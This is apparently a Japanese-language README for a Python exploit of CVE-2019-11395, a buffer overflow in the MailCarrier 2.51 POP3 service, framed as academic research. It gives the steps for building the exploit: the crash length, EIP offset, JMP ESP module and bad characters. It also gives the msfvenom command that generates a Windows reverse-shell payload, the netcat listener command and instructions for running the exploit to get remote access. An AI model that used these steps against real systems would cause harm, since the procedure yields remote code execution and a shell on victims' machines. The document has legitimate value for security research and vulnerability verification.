
CVE-2019-11395のPythonエクスプロイト。MailCarrier 2.51 POP3サービスのバッファオーバーフローです。msfvenomを介してリバースシェルペイロードを生成し、Windowsターゲットでリモートコード実行を達成します。
CVE-2019-11395 脆弱性は、MailCarrier 2.51 電子メールアプリケーションにおけるバッファオーバーフローの脆弱性であり、リモートコード実行を可能にします。この脆弱性は、SMTP RCPT TO、POP3 USER、POP3 LIST、POP3 TOP、または POP3 RETR プロセスで発生します。
学術研究では、Proof of Concept (PoC) を作成するために POP3 プロセスに焦点が置かれました。アプリケーションに 6000 バイトを送信するとアプリケーションが機能を停止することが確認され、バッファオーバーフローの脆弱性が明らかになりました。
msf-pattern_create -l 6000 を使用しました。msf-pattern_offset -q 6E47386E -l 6000 で EIP オフセットを特定し、EIP オフセットが 5095 であることを確認しました。expsrv.dll を特定しました。JMP ESP に適しています。\x00\x0a\x0d を特定しました。msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode を使用してペイロードを生成しました。CVE-2019-11395.py コードを調整しました。nc -lnvp 4444 で接続を開き、エクスプロイト(CVE-2019-11395.py)を実行して環境へのアクセスを取得し、説明した CVE を検証しました。エクスプロイトを利用するには、次の手順に従ってください:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode を使用してペイロードを生成します。msfvenom コマンドの出力をコピーします。CVE-2019-11395.py コードを調整し、shellcode 変数を msfvenom コマンドから取得した出力に置き換えます。CVE-2019-11395.py)を実行して環境へのアクセスを取得し、説明した CVE を検証します。
LinkedIn で私のプロフィールをご覧ください